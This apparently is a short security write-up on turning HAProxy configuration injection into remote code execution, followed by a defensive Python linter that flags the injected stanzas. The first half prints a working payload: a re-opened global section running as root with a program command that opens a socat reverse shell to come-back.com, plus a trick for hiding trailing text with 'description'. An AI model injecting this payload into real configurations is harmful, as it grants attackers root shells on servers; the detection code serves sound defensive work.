Slight problem on the job: you can inject some backend block rules into a HAProxy config, so how do you get RCE when Lua isn’t compiled in? Well, it turns out you can use the master-worker + program + command configuration stanzas! Worked on v2.8 at least.

HAProxy will refuse the config if you have two backends with the same name, but you can (re-)open the global (and defaults) section several times. It’s weird, but it also means we can inject from anywhere!

global
    master-worker
    user root
    group root
    program testing
    command /usr/bin/socat TCP:come-back.com:9999 EXEC:'bash',pty,stderr,setsid,sigint,sane

You can also use the -dC flag to have HAProxy spit out the configuration file as it sees it.

Bonus: if you can’t use a comment (‘#’) character to hide the chars after the injection point, use description; it will act as a line comment:

backend commented-out
    mode http   # <= specify a mode or it won't be valid config
    description __hide me under the carpet__
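
Seen from the defending side, the stanzas described above are easy to lint for in a rendered config before HAProxy loads it. This is an added example, not code from the original post: the function name audit, the rule names and the sample config are assumptions made here, and the check flags re-opened global sections, program/command stanzas, master-worker mode, root user/group and description lines for review.

```python
import shlex

# Keywords that open a new HAProxy section (subset; indentation is irrelevant).
SECTIONS = {"global", "defaults", "frontend", "backend", "listen", "program",
            "userlist", "peers", "resolvers", "mailers", "cache", "ring"}

def audit(config_text):
    """Return (line_no, rule, detail) findings for a rendered HAProxy config."""
    findings, section, globals_seen = [], None, 0
    for no, raw in enumerate(config_text.splitlines(), 1):
        try:
            words = shlex.split(raw, comments=True)   # drops '#' comments
        except ValueError:                            # unbalanced quote
            words = raw.split("#", 1)[0].split()
        if not words:
            continue
        key, args = words[0], " ".join(words[1:])
        if key in SECTIONS:
            section = key
            globals_seen += key == "global"
            if key == "global" and globals_seen > 1:
                findings.append((no, "global-reopened", f"occurrence {globals_seen}"))
            elif key == "program":
                findings.append((no, "program-section", args))
        elif section == "program" and key == "command":
            findings.append((no, "program-command", args))
        elif section == "global" and key == "master-worker":
            findings.append((no, "master-worker", "master-worker mode set"))
        elif section == "global" and key in ("user", "group") and args == "root":
            findings.append((no, "runs-as-root", f"{key} root"))
        elif section in ("frontend", "backend", "listen") and key == "description":
            findings.append((no, "description", args))
    return findings

SAMPLE = """\
global
    log stdout format raw local0
backend app
    server s1 127.0.0.1:8080
global
    master-worker
    user root
program example
    command /bin/true
backend filler
    description trailing text ends up here
"""  # Constructed sample: a templated config with an extra block appended.

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

A deployment that never uses program sections can treat any program-section or program-command finding as a hard failure in the pipeline that renders the config.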